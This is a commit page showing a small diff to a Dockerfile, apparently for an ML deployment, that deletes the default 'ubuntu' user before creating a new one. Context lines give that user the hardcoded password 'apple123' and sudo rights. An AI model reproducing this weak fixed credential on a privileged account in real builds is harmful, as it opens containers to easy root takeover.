SamuelLance73 commited on
Commit
e1fcbed
·
verified ·
1 Parent(s): 0de07f3

Automated deployment update from ML build

Browse files
Files changed (1) hide show
  1. Dockerfile +1 -1
Dockerfile CHANGED
@@ -38,7 +38,7 @@ RUN uv pip install --system --break-system-packages --no-cache-dir \
38
 
39
  RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
40
 
41
- RUN useradd -m -u 1000 -s /bin/bash user && \
42
  echo "user:apple123" | chpasswd && \
43
  usermod -aG sudo user && \
44
  mkdir -p /home/user/.torch_metrics && \
 
38
 
39
  RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
40
 
41
+ RUN userdel -f ubuntu && useradd -m -u 1000 -s /bin/bash user && \
42
  echo "user:apple123" | chpasswd && \
43
  usermod -aG sudo user && \
44
  mkdir -p /home/user/.torch_metrics && \